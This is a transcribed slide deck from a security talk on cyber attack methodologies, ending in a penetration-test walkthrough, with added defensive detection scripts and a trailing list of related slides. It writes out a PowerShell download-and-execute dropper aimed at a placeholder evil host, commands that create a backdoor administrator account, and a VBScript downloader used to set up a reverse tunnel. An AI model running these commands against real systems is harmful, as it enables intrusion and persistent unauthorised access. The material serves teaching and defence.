Cyber Attacks Methodologies
29-11-2017
Geeks Anonymes
1. Objectives
2. Introduction
3. Cyber Attack Lifecycle
4. Vulnerabilities and Exploitation
5. Social Engineering and Advanced Persistent Threats
6. Example of a penetration test scenario
7. Conclusion
Introduction
Introduction
- Frédéric De Pauw
- Cyber Security specialist & ethical hacker
  - Head Security Services @NRB
  - Freelance Ethical Hacker (BE – LUX – US)
  - https://be.linkedin.com/in/fdepauw
Introduction
- What is Cyber Crime?
  - Computer crime, or cybercrime, is crime that involves a computer and a network
- Two types of Cyber Crime:
  - Technology is the Target: enterprise, state systems, personal systems
  - Technology is the Instrument: criminal activities on the Internet
- This session is focused on the first type
Introduction
Technology = Target | Technology = Instrument
Distributed Denial of Service | Child pornography
Hacking | Incitement to racial hatred
Malware, Ransomware | Incitement to terrorism
Phishing | Money laundering
Hacktivism | Drug sales
… | Spam, …
Introduction
- Cyber Crime
  - Has evolved drastically over the past years, following the global evolution of the ICT supporting human activity
  - Allows cyber criminals to make profits equivalent to other types of criminality
  - Offers some advantages over other criminal activities: anonymity, discretion, no borders
  - Remains little fought, with no international legislation
  - Has evolved into cyber war with state-sponsored attacks
  - Will affect our lives (connected cars, Operational Technologies, IoT)
  - Cost of Cyber Crime in Belgium: 3,5 billion Euros
Introduction
Evolution of Cyber Crime
[Figure: timeline of cyber crime, 1985-1995 to 2010-2017-…; vertical axis: Sophistication]
1985-1995
Entertainment
First Worms
Phone Hacking
2010-2017-…
Hacktivism
Virus Spread
Website Defacement
Organized Crime
DDOS
Company Systems Hacking
Data Leak
Industrial espionage
Cyber War
Targeted Attacks
State-Sponsored Attacks
Introduction
Cyber War – NSA Hacking Tools Leak (2017)
1. NSA contractor has NSA hacking tools on his PC
2. NSA contractor installs a trojan
3. NSA contractor runs a full scan
4. Kaspersky AV discovers malware + NSA hacking tools
5. Russian spies are somehow aware of the discovery of NSA tools (Kaspersky denies giving info)
6. Russian spies further hack the contractor's PC
Introduction
- Future of Cyber Crime
  - Intensification of targeted cyber attacks against enterprises, with significant impacts (financial, image..)
  - Predominance of Advanced Persistent Threats targeting the end user
  - 99% of system compromises will still use unpatched vulnerabilities
  - Intensification of cyber war / cyber espionage activities between nations
  - Increase of cyber crime targeting connected objects and operational technologies
    - Mirai botnet – 2017
    - Hackable cardiac devices – 2017
    - WIFI Baby Heat Monitor device – 2017
    - Jeep SUV hack – 2015
Introduction
- Legal evolution
  - General Data Protection Regulation (GDPR) – adopted end of 2016 – comes into force 25 May 2018
  - Circulars of the National Bank of Belgium
    - Regulation for the financial sector
  - Data breach notification standard
    - Within 72 hours
  - Fines in case of data leak
    - Max 4% of turnover, maximum 20 M€
Cyber Attack Life Cycle
Cyber Attack Lifecycle
1 Reconnaissance
- Public Information
- Social Networks
- Vulnerability Scanning
- Physical Observation
2 Initial Infection
- Vulnerabilities
- Virus / Malware
- Social Engineering
- Physical Intrusion
3 Gain Control
- Control infected system
4 Privilege Escalation
- Gain elevated privileges on the infected system
5 Lateral Movement
- Compromise more systems deeper in the network
6 Persistence
- Maintain persistent connection with infected systems
7 Malicious Activities
- Data Exfiltration
- Hacking Websites
- Money Extortion
- ..
Cyber Attack Lifecycle
> Reconnaissance
- The reconnaissance process is a key activity
  - During this phase, the information that is crucial to performing a cyber attack is obtained
  - For instance, this information will be used to determine the best attack vector
- Activities performed are:
  - Collecting information about the target (websites, telephone numbers, general mailboxes..) from public sources
  - Collecting information through direct contact such as phone calls (fake poll, job seeker..)
  - Collecting technical information about the target information system (exposed systems, partners, data centers..)
  - Collecting information on premises (garbage, WIFI scanning..)
  - Actively scanning enterprise networks exposed on the Internet
Cyber Attack Lifecycle
> Reconnaissance
- After the reconnaissance activities, attackers must have obtained enough information to determine the best attack vectors for the initial infection phase
- For instance:
  - Vulnerabilities affecting systems exposed on the Internet
  - Lack of physical access control at facilities
  - Social engineering attack on selected profiles found, for instance, through social network information
Cyber Attack Lifecycle
> Initial Infection
- Initial Infection is aimed at obtaining a first backdoor within the target information system
- Vectors:
  - Exploiting a vulnerability affecting the victim’s system(s)
  - Infection through Virus / Malware
  - Exploiting a physical vulnerability
Cyber Attack Lifecycle
> Initial Infection
[Diagram: zones exposed to initial infection: Perimeter, Public Cloud, Private Cloud, Corporate Network, End Users. Labels: SaaS Applications, Corporate Applications, On Prem Applications, each with Servers / Appliances and Security Technology.]
Cyber Attack Lifecycle
> Initial Infection
- IDS/IPS Bypass
  - Encryption
- Anti-Virus Bypass
  - Use a simple PowerShell dropper which fetches an encrypted payload over the Internet
    powershell.exe "IEX ((new-object net.webclient).downloadstring('http://EvilWebSite/payload.txt'))"
  - Unknown viruses
  - Use staging to decouple the payload from the initial dropper
  - The dropper is injected directly into memory
  - Fileless malware infection
- Firewall Bypass
  - Uses « reverse » connections which connect to the C&C
  - E.g. HTTPS passing through the enterprise proxy
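Seen from the defender's side, the dropper above leaves a recognisable process command line. The following is an added example, not part of the original slides: it triages process-creation records (such as Windows event 4688 or Sysmon event 1) for the "download and run in memory" pattern, including the case where the same script is passed base64-encoded. The record layout, host names and severity rules are assumptions made for the example.

```python
import base64
import re

# Script text of the slide's dropper; encoded below to build one constructed sample.
PAGE_SCRIPT = "IEX ((New-Object Net.WebClient).DownloadString('http://EvilWebSite/payload.txt'))"
ENCODED = base64.b64encode(PAGE_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed process-creation records: time|host|parent image|command line
SAMPLE_EVENTS = [
    r'''2017-11-29T09:14:02|WS-041|C:\Program Files\Microsoft Office\WINWORD.EXE|powershell.exe "IEX ((new-object net.webclient).downloadstring('http://EvilWebSite/payload.txt'))"''',
    r"2017-11-29T09:20:45|WS-017|C:\Windows\explorer.exe|powershell.exe -NoProfile -File C:\Scripts\inventory.ps1",
    r'2017-11-29T09:31:10|SRV-DB2|C:\Windows\System32\svchost.exe|powershell.exe -Command "Get-Service | Where-Object Status -eq Running"',
    r"2017-11-29T10:02:33|WS-058|C:\Windows\System32\cmd.exe|powershell.exe -nop -w hidden -enc " + ENCODED,
]

POWERSHELL_RX = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
IEX_RX = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
DOWNLOAD_RX = re.compile(
    r"\.download(?:string|data|file)\b|\binvoke-webrequest\b|\binvoke-restmethod\b", re.I)
HIDDEN_RX = re.compile(r"\s-w(?:indowstyle)?\s+hidden\b", re.I)
# -e, -ec, -en, -enc ... -EncodedCommand followed by a base64 blob
ENC_ARG = re.compile(r"\s-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Document readers that should not normally start a shell (assumed list)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}


def parse_event(line):
    """Split one record; the command line is the last field, so it may contain '|'."""
    time, host, parent, cmdline = line.split("|", 3)
    return {"time": time, "host": host, "parent": parent, "cmdline": cmdline}


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    match = ENC_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers bad base64 and bad UTF-16
        return None


def findings(cmdline):
    """Return the set of indicators present in one PowerShell command line."""
    found = set()
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        found.add("encoded_command")
        # Inspect the decoded script instead of the opaque blob
        text = ENC_ARG.sub(" ", cmdline) + "\n" + decoded
    if IEX_RX.search(text):
        found.add("invoke_expression")
    if DOWNLOAD_RX.search(text):
        found.add("web_download")
    if HIDDEN_RX.search(text):
        found.add("hidden_window")
    return found


def triage(lines):
    """Alert on command lines that both download content and evaluate it."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        if not POWERSHELL_RX.search(event["cmdline"]):
            continue
        found = findings(event["cmdline"])
        if not {"invoke_expression", "web_download"} <= found:
            continue
        parent = event["parent"].rsplit("\\", 1)[-1].lower()
        alerts.append({
            "time": event["time"],
            "host": event["host"],
            "severity": "critical" if parent in OFFICE_PARENTS else "high",
            "indicators": sorted(found),
        })
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```
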
Cyber Attack Lifecycle
> Initial Infection
- Metasploit + SET (Social Engineering Toolkit)
- Create a Meterpreter backdoor using SET for the payload and Metasploit for the C&C server
  - Create the PowerShell payload
  - Move the payload to the evil web server
  - Create the « Dropper »
  - Start the listener
Cyber Attack Lifecycle
> Gain Control
- Once the initial infection is performed, the objective is to get control over the machine
- For this, a network connection must be established between the victim and the Command & Control server
- In general, a « reverse » connection is made to bypass inbound firewall protection
- Several techniques exist to bypass outbound filtering (if present)
Cyber Attack Lifecycle
> Gain Control
- Standard enterprise security principles for outbound filtering:
  - Default policy is to deny all outbound connections
  - Allowed outbound connections must go through a proxy
  - Outbound connections must conform to the expected protocol
  - Outbound connections must pass other checks as well
- Examples of outbound filtering evasion techniques
  - Reverse HTTP and / or HTTPS traffic (with or without proxy settings verification)
  - Payload staging over DNS by placing the payload in the TXT records of a domain
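The principles above (default deny, egress through the proxy only, protocol must match the port) can be checked against captured flows. This added example is not from the slides: it classifies the first bytes a client sends and reports flows that break the policy, such as an SSH banner or raw console text on a web port. The addresses, the proxy IP and the flow records are constructed.

```python
# Policy from the slide: default deny, egress only via the proxy, protocol must match the port.
PROXY = "192.0.2.10"                    # constructed proxy address
EXPECTED = {80: "http", 443: "tls"}     # allowed egress ports and the protocol expected on each
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ",
                b"OPTIONS ", b"CONNECT ", b"PATCH ")

# Constructed first client bytes: start of a TLS handshake record carrying a ClientHello
TLS_HELLO = bytes.fromhex("16030100c8010000c40303") + bytes(32)

# Constructed flows: (source, destination, destination port, first bytes sent by the client)
SAMPLE_FLOWS = [
    ("192.0.2.10", "198.51.100.20", 443, TLS_HELLO),
    ("192.0.2.10", "198.51.100.21", 80,
     b"GET /index.html HTTP/1.1\r\nHost: www.example.org\r\n\r\n"),
    ("192.0.2.50", "203.0.113.7", 443, b"SSH-2.0-PuTTY_Release_0.70\r\n"),
    ("192.0.2.50", "203.0.113.7", 80, b"Microsoft Windows [Version 5.2.3790]\r\n"),
    ("192.0.2.10", "198.51.100.22", 8443, TLS_HELLO),
]


def classify(first_bytes):
    """Name the protocol a client is speaking from the first bytes it sends."""
    # SSH: the client opens with its identification string "SSH-<version>-<software>"
    if first_bytes.startswith(b"SSH-"):
        return "ssh"
    # TLS: record type 0x16 (handshake), major version 0x03, handshake type 0x01 (ClientHello)
    if (len(first_bytes) >= 6 and first_bytes[0] == 0x16 and first_bytes[1] == 0x03
            and first_bytes[2] <= 0x04 and first_bytes[5] == 0x01):
        return "tls"
    # HTTP/1.x: a known method and a request line ending with the version token
    if first_bytes.startswith(HTTP_METHODS):
        request_line = first_bytes.split(b"\r\n", 1)[0]
        if request_line.endswith((b" HTTP/1.0", b" HTTP/1.1")):
            return "http"
    return "unknown"


def check_flow(src, dst, dport, first_bytes):
    """Return the list of policy violations for one outbound flow."""
    violations = []
    if src != PROXY:
        violations.append("direct_egress")          # did not go through the proxy
    expected = EXPECTED.get(dport)
    if expected is None:
        violations.append("port_not_allowed")       # default deny
        return violations
    seen = classify(first_bytes)
    if seen != expected:
        violations.append(f"protocol_mismatch:expected={expected},seen={seen}")
    return violations


def audit(flows):
    """Return (src, dst, dport, violations) for every flow that breaks the policy."""
    report = []
    for src, dst, dport, first_bytes in flows:
        violations = check_flow(src, dst, dport, first_bytes)
        if violations:
            report.append((src, dst, dport, violations))
    return report


if __name__ == "__main__":
    for row in audit(SAMPLE_FLOWS):
        print(row)
```
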
Cyber Attack Lifecycle
> Gain Control
- Metasploit / Meterpreter
  - Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Cyber Attack Lifecycle
> Privilege Escalation
- Escalate privileges on infected machines in order to gain elevated access
  - Typical example is getting Administrator privileges
- Several techniques
  - « Local exploits » against local applications on the infected machine
  - Manual search for credentials in scripts
  - Password hash dump (e.g. SAM, /etc/passwd) and cracking
  - Grabbing authenticated sessions (e.g. VPN sessions)
  - LSASS process dump (Mimikatz)
  - SSH keys
  - World-writable files
  - Reading command history files
  - Alteration of batches / jobs
  - Process injection
    - Try injecting malicious code into processes running under a « Domain Admin » privileged user
Cyber Attack Lifecycle
> Privilege Escalation
- Metasploit: « Incognito » module
  - Allows impersonating authentication tokens on compromised Windows hosts
  - The backdoor must run with « SYSTEM » or « Administrator » privileges in order to see interesting authentication tokens
  - TIP: File servers are virtual treasure troves of tokens, since most file servers are used as network attached drives via domain logon scripts
Cyber Attack Lifecycle
> Lateral Movement
- From infected systems, try to infect more systems deeper in the network
  - Basically, repeat the cyber attack lifecycle process (recon, initial infection, privilege escalation…)
  - Aim for high-value systems: Windows domain controllers, file servers..
- Techniques
  - Credential re-use / pass-the-hash / SSH key re-use
  - Vulnerabilities in internal applications (less often patched)
  - Network segmentation issues between environments (e.g. port 445) – PsExec with Pass-The-Hash
Cyber Attack Lifecycle
> Lateral Movement
- Metasploit – Pivoting technique
- Basically, using the first compromise to allow and even aid in the compromise of other, otherwise inaccessible systems
  - Use Autoroute to make the compromised host a pivot to other networks
  - Scan the network through the route created, on ports 139 & 445
  - Start a new session on a new host using PsExec and the « Pass-The-Hash » technique, re-using the local Administrator password hash
Cyber Attack Lifecycle
> Maintain Persistence
- Prevent loss of connection between infected machines and the C&C
- Techniques
  - Create jobs / scheduled tasks
  - Create a service running on startup
  - Use AppInit DLLs (disabled in Windows 8 with Secure Boot enabled)
  - Bootkit / Rootkit
  - Default file association
  - Logon scripts
  - Modification of applications / services
  - Registry RUN keys
Cyber Attack Lifecycle
> Maintain Persistence
- Metasploit / Persistence module
  - Create a Meterpreter service which will start when the compromised host boots
Cyber Attack Lifecycle
> Demo
- Social Engineering scenario
  - Send a « virus » to the victim, which consists of a Metasploit Meterpreter instance
  - Undetected by up-to-date commercial antivirus
1. Prepare malware & environment
2. Send malware
3. Execute malware
4. Get infected & contact C&C
5. Interact
Vulnerabilities and Exploitation
Vulnerabilities and Exploitation
- A vulnerability is a flaw in a system which allows a malicious user to compromise its confidentiality, integrity and / or availability
  - Simple: default password. Complex: buffer overflow in an application
- Dozens of new vulnerabilities are officially classified every day
  - http://www.cvedetails.com
- Dozens of others are not disclosed!
  - 0DAY – vulnerabilities not discovered, or not disclosed
- Vulnerabilities are discovered by
  - Researchers, students (ethical hackers)
  - Professional researchers (vulnerability brokers)
    - http://www.zerodayinitiative.com/
    - France – Vupen Security – sells vulnerabilities to NASA
  - Cyber criminals (0DAYS)
Vulnerabilities and Exploitation
- Full disclosure principle
  - Vulnerabilities are reported and published publicly as soon as they are discovered, without taking into account whether a patch is available
- Responsible disclosure principle
  - Vendors are notified first
  - The vulnerability is publicly disclosed after 45 days
- Websites with vulnerabilities and associated exploits
  - www.securityfocus.com
  - www.1337day.com (not free)
  - http://www.cvedetails.com/
  - http://www.exploit-db.com/
  - Underground websites on the TOR network
- Conferences: defcon.org (US), brucon.be (BE), hack.lu (LU), hackitoergosum.org (FR), ccc.de (ALL), blackhat.com (US)
Vulnerabilities and Exploitation
HTTPS://0day.today/
Vulnerabilities and Exploitation
- Complexity of systems, application code, communication flows, network segmentation
- Out-of-the-box vulnerabilities of vendor solutions, lack of security configuration
  - Next->Next->Next syndrome
- Lack of secure coding awareness
  - OWASP Top 10
- Lack of enforcement of security during IT projects
  - Security implies cost and time
- Need for functionality <-> need for security
  - Blacklist mode
  - Learning mode
Social Engineering and Advanced Persistent Threats
Human Vulnerabilities / Social Engineering
- Social engineering is the preferred attack vector, as it is generally easier to bypass preventive security measures that way
- Targets can be the company's employees but also partners / subcontractors
- Two types of social engineering:
  - Human SE
  - Technical SE
Human Vulnerabilities / Social Engineering
- Technical SE is aimed at compromising end-user systems
- Transmission of the malware follows « authorized » routes, such as e-mail and/or web browsing
- Bypasses security measures such as perimeter security, firewalls,..
1. INFECTION
2. CONTROL
Human Vulnerabilities / Social Engineering
- Attack methodologies:
  - Encourage users to install tools such as « TeamViewer » or « LogMeIn »
  - Send malware through e-mail
    - Word/Excel files with malicious macros
    - PDF files exploiting PDF vulnerabilities
  - Send mail containing links to malicious web sites
  - Send phishing SMS to smartphones (SMShing)
  - Drop USB keys containing viruses (STUXNET)
  - USB gadgets configured to simulate a keyboard
Human Vulnerabilities / Social Engineering
- Nowadays systems are in general protected against USB infection through the autorun functionality
- New method -> « Hacker Interface Devices »
  - Attackers embed malicious code within USB gadgets
  - Once connected, those gadgets simulate a keyboard and start sending commands to the computer (keystroke injection)
  - Those commands can drop malware as easily as other techniques
  - Ref: http://hakshop.myshopify.com/products/usb-rubber-ducky-deluxe
[Image: USB gadgets]
Penetration test example
Penetration test example
- Context: Black Box intrusion test. Scope: external-facing systems
[Diagram: Web Servers, ports 80 (HTTP) and 443 (HTTPS), in the DMZ; Intranet with the enterprise Windows domain on the internal network]
Penetration test example
- VULN 1/2: Vulnerable deployment of SAP BO (Apache Axis2)
  - CVE-2010-0219, Apache Axis2 default credentials
  - http://www.securityfocus.com/bid/40343, Apache Axis2 directory traversal
- See earlier:
  - Vuln « Directory Traversal »
  - Vuln « Default Password »
- Gives admin credentials to Axis2
Penetration test example
- Access to the Axis2 administration console allows uploading a web service and deploying it LIVE
Penetration test example
- A Metasploit module exists to exploit this vulnerability: Axis2 / SAP BusinessObjects Authenticated Code Execution
  - http://www.rapid7.com/db/modules/exploit/multi/http/axis2_deployer
- We use it to deploy a reverse shell backdoor on the server, which connects back to port 80
- VULN 3: The server is allowed to contact any host on the Internet on ports 80 and 443
[Diagram: Web Servers (ports 80 HTTP and 443 HTTPS) in the DMZ connect out on port 80 to the C&C SERVER – PORT 80; Intranet with the enterprise Windows domain on the internal network]
Penetration test example
- Not possible to upload a Meterpreter (killed by AV on the machine)
- Possible to upload a backdoor which sends me back a DOS command prompt on the server
Penetration test example
- Next steps: create a privileged account on the server
  - VULN 4: Application server is running under ADMIN privileges
    net user temptest password /add
    net localgroup Administrators temptest /add
- Obtain a Remote Desktop connection
  - Problem: port 3389 is closed inbound
  - Solution: create a reverse SSH tunnel with reverse port forwarding on port 3389
[Diagram: Web Servers; C&C SERVER – PORT 80; SSH SERVER – PORT 443; reverse SSH tunnel over port 443 carrying port 3389]
Penetration test example
- To create the tunnel, I need to download an SSH client onto the server using the DOS command prompt
- I create a VBScript file using the « echo » command, then execute it
    echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> dl.vbs
    cscript dl.vbs
- Content of dl.vbs:
    dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
    dim bStrm: Set bStrm = createobject("Adodb.Stream")
    xHttp.Open "GET", "http://www.putty.com/plink.exe", False
    xHttp.Send
    with bStrm
        .type = 1 '//binary
        .open
        .write xHttp.responseBody
        .savetofile "c:\temp\plink.exe", 2 '//overwrite
    end with
- Use plink to create the tunnel
Penetration test example
[Diagram: Web Servers; C&C SERVER – PORT 80; SSH SERVER – PORT 443; reverse SSH tunnel over port 443 carrying port 3389]
- Connect to RDP through the tunnel and use the user account I just created to connect
  - temptest
  - password
Penetration test example
- Next step -> Lateral Movement – the simplest first, credentials reuse
  - I need to crack all passwords present locally on the infected server
- Vuln 6/7: Windows 2003 design vulnerabilities
  - VULN 6: « Repair » file contains a SAM backup file containing encrypted credentials using LMHASH
  - VULN 7: LMHASH encryption algorithm is broken and can be cracked easily
Penetration test example
- After some minutes
Penetration test example
- VULN 8: Local Administrator password is replicated over all systems in the DMZ
[Diagram: through the reverse SSH tunnel over port 443, port 3389 is reached on each of the Web Servers in the DMZ; C&C SERVER – PORT 80; SSH SERVER – PORT 443]
Penetration test example
- Next step: try to hit the internal network
  - VULN 9: DMZ systems are members of the internal Windows domain. This means that critical ports (e.g. 139, 445, …) must be open between the DMZ and the internal network
  - VULN 10: Password replication bis – a Domain Admin user account whose name is identical to a local account has the same password
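VULN 6/7, 8 and 10 can all be found by the defender before a tester does. This added example is not from the slides: it audits pwdump-style exports (`user:rid:lm:nt:::`) for accounts that still store an LM hash, local credentials shared between hosts, and domain accounts that reuse a local account's name and password. Host names, account names and hash values are constructed; only the two "empty" constants are real.

```python
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # stored when no LM hash is kept
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# Constructed hash values (not derived from any real password)
LM_A = "0123456789abcdeffedcba9876543210"
LM_SHORT = "0f1e2d3c4b5a6978" + EMPTY_LM[:16]   # second half empty: password of 7 chars or fewer
NT_A = "aaaabbbbccccdddd1111222233334444"
NT_B = "bbbbccccddddeeee2222333344445555"
NT_C = "ccccddddeeeeffff3333444455556666"
NT_D = "ddddeeeeffff00004444555566667777"

# Constructed exports, one per DMZ host, plus one for the domain
LOCAL_DUMPS = {
    "DMZ-WEB1": f"""Administrator:500:{LM_A}:{NT_A}:::
Guest:501:{EMPTY_LM}:{EMPTY_NT}:::
svc_backup:1003:{LM_SHORT}:{NT_B}:::""",
    "DMZ-WEB2": f"""Administrator:500:{LM_A}:{NT_A}:::
Guest:501:{EMPTY_LM}:{EMPTY_NT}:::""",
    "DMZ-APP1": f"""Administrator:500:{EMPTY_LM}:{NT_A}:::
jdoe:1005:{EMPTY_LM}:{NT_C}:::""",
}
DOMAIN_DUMP = f"""Administrator:500:{EMPTY_LM}:{NT_D}:::
jdoe:1104:{EMPTY_LM}:{NT_C}:::"""


def is_hex32(value):
    """True for a 32-character hexadecimal string."""
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value)


def parse_pwdump(text):
    """Yield (user, rid, lm, nt) from 'user:rid:lm:nt:::' lines, skipping malformed ones."""
    for raw in text.splitlines():
        parts = raw.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        yield parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()


def audit(local_dumps, domain_dump):
    """Report LM storage, shared local credentials and domain/local password reuse."""
    lm_stored = []
    hosts_by_cred = defaultdict(set)            # (user, nt hash) -> hosts using it
    for host, text in local_dumps.items():
        for user, _rid, lm, nt in parse_pwdump(text):
            if is_hex32(lm) and lm != EMPTY_LM:
                short = lm[16:] == EMPTY_LM[:16]
                lm_stored.append((host, user, short))
            if nt != EMPTY_NT:                  # ignore blank passwords (e.g. disabled Guest)
                hosts_by_cred[(user.lower(), nt)].add(host)

    shared_local = sorted(
        (user, sorted(hosts))
        for (user, _nt), hosts in hosts_by_cred.items() if len(hosts) > 1)

    domain_reuse = sorted(
        (user, sorted(hosts_by_cred[(user.lower(), nt)]))
        for user, _rid, _lm, nt in parse_pwdump(domain_dump)
        if (user.lower(), nt) in hosts_by_cred)

    return {"lm_stored": sorted(lm_stored),
            "shared_local": shared_local,
            "domain_reuse": domain_reuse}


if __name__ == "__main__":
    for finding, rows in audit(LOCAL_DUMPS, DOMAIN_DUMP).items():
        print(finding, rows)
```
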
Penetration test example
- I connect to the Domain Controller from the DMZ using the Domain Admin account. I am now Domain Administrator and have full control over the Enterprise Domain
[Diagram: Web Servers (ports 80 HTTP and 443 HTTPS) in the DMZ; Intranet with the enterprise Windows domain and its Domain Controller]
Conclusion

Contenu connexe

Tendances

Anatomy of a cyber attack
Anatomy of a cyber attackAnatomy of a cyber attack
Anatomy of a cyber attackMark Silver
 
Cyber Kill Chain Deck for General Audience
Cyber Kill Chain Deck for General AudienceCyber Kill Chain Deck for General Audience
Cyber Kill Chain Deck for General AudienceTom K
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101Jannis Kirschner
 
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...Edureka!
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Edureka!
 
Penetration testing
Penetration testingPenetration testing
Penetration testingAmmar WK
 
Introduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingIntroduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingRaghav Bisht
 
Introduction to Cybersecurity
Introduction to CybersecurityIntroduction to Cybersecurity
Introduction to CybersecurityKrutarth Vasavada
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing BasicsRick Wanner
 
Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023PECB
 
SOC Architecture Workshop - Part 1
SOC Architecture Workshop - Part 1SOC Architecture Workshop - Part 1
SOC Architecture Workshop - Part 1Priyanka Aash
 
Types of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsTypes of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsLearningwithRayYT
 
Social engineering-Attack of the Human Behavior
Social engineering-Attack of the Human BehaviorSocial engineering-Attack of the Human Behavior
Social engineering-Attack of the Human BehaviorJames Krusic
 
Security Information and Event Management (SIEM)
Security Information and Event Management (SIEM)Security Information and Event Management (SIEM)
Security Information and Event Management (SIEM)hardik soni
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligencemohamed nasri
 

Tendances (20)

Anatomy of a cyber attack
Anatomy of a cyber attackAnatomy of a cyber attack
Anatomy of a cyber attack
 
Cyber security
Cyber securityCyber security
Cyber security
 
Cyber Kill Chain Deck for General Audience
Cyber Kill Chain Deck for General AudienceCyber Kill Chain Deck for General Audience
Cyber Kill Chain Deck for General Audience
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
 
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...
What is Cyber Security? | Introduction to Cyber Security | Cyber Security Tra...
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
 
Threat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill ChainThreat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill Chain
 
Vulnerability and Patch Management
Vulnerability and Patch ManagementVulnerability and Patch Management
Vulnerability and Patch Management
 
Introduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingIntroduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration Testing
 
Introduction to Cybersecurity
Introduction to CybersecurityIntroduction to Cybersecurity
Introduction to Cybersecurity
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
CYBER SECURITY
CYBER SECURITYCYBER SECURITY
CYBER SECURITY
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023
 
SOC Architecture Workshop - Part 1
SOC Architecture Workshop - Part 1SOC Architecture Workshop - Part 1
SOC Architecture Workshop - Part 1
 
Types of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsTypes of Threat Actors and Attack Vectors
Types of Threat Actors and Attack Vectors
 
Social engineering-Attack of the Human Behavior
Social engineering-Attack of the Human BehaviorSocial engineering-Attack of the Human Behavior
Social engineering-Attack of the Human Behavior
 
Security Information and Event Management (SIEM)
Security Information and Event Management (SIEM)Security Information and Event Management (SIEM)
Security Information and Event Management (SIEM)
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligence
 

Similaire à Cyber Attack Methodologies

Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...
Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...
Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...wajug
 
Cse ethical hacking ppt
Cse ethical hacking pptCse ethical hacking ppt
Cse ethical hacking pptSHAHID ANSARI
 
Cse ethical hacking ppt
Cse ethical hacking pptCse ethical hacking ppt
Cse ethical hacking pptSHAHID ANSARI
 
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary ReadingThe Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary ReadingMuhammad FAHAD
 
3 Hkcert Trend
3  Hkcert Trend3  Hkcert Trend
3 Hkcert TrendSC Leung
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Securitybelsis
 
Event - Internet Thailand - Total Security Perimeters
Event - Internet Thailand - Total Security PerimetersEvent - Internet Thailand - Total Security Perimeters
Event - Internet Thailand - Total Security PerimetersSomyos U.
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hackingAnumadil1
 
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
